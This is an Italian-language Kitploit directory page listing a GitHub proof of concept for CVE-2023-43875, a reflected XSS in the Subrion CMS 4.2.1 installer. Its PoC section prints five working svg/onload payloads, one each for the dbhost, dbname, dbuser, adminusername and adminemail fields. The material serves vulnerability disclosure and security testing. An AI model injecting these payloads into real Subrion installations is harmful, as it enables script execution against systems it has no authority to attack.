Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation — Subrion CMS 4.2.1 è affetto da una vulnerabilità di Cross-Site Scripting (XSS) che consente agli aggressori di eseguire codice arbitrario tramite un payload appositamente predisposto nel processo di installazione. | Kitploit
Strumenti/GitHubGitHub/sromanhu/cve-2023-43875-subrion-cms-reflected-xss---installation
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubsromanhu/cve-2023-43875-subrion-cms-reflected-xss---installation

CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation

Subrion CMS 4.2.1 è affetto da una vulnerabilità di Cross-Site Scripting (XSS) che consente agli aggressori di eseguire codice arbitrario tramite un payload appositamente predisposto nel processo di installazione.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
2 anni faNon ancora revisionato

Subrion CMS XSS Riflesso v4.2.1

Autore: (Sergio)

Descrizione: Multiple vulnerabilità di Cross-Site Scripting (XSS) nell'installazione di Subrion CMS v.4.2.1 consentono a un attaccante locale di eseguire script web arbitrari tramite un payload appositamente creato iniettato in dbhost, dbname, dbuser, adminusername e adminemail.

Vettori di attacco: Una vulnerabilità nella sanitizzazione dell'installazione in dbhost, dbname, dbuser, adminusername e adminemail consente l'iniezione di codice JavaScript.


POC:

Durante il processo di installazione inseriamo il payload XSS in uno qualsiasi dei 5 campi e quando facciamo clic su Avanti, otteniamo il pop-up XSS.

Payload XSS:

root@kitploit:~
'"><svg/onload=alert('dbhost')>

Payload XSS:

root@kitploit:~
'"><svg/onload=alert('dbname')>

Payload XSS:

root@kitploit:~
'"><svg/onload=alert('dbuser')>

Payload XSS:

root@kitploit:~
'"><svg/onload=alert('adminusername')>

Payload XSS:

root@kitploit:~
'"><svg/onload=alert('adminemail')>

Payload XSS installazione

Nell'immagine seguente puoi vedere il codice incorporato che esegue il payload nel processo di installazione.

dbhost

dbname

dbuser

adminusername

adminemail


Informazioni aggiuntive:

http://www.cmsmadesimple.org/

https://owasp.org/Top10/es/A03_2021-Injection/

Scarica lo strumento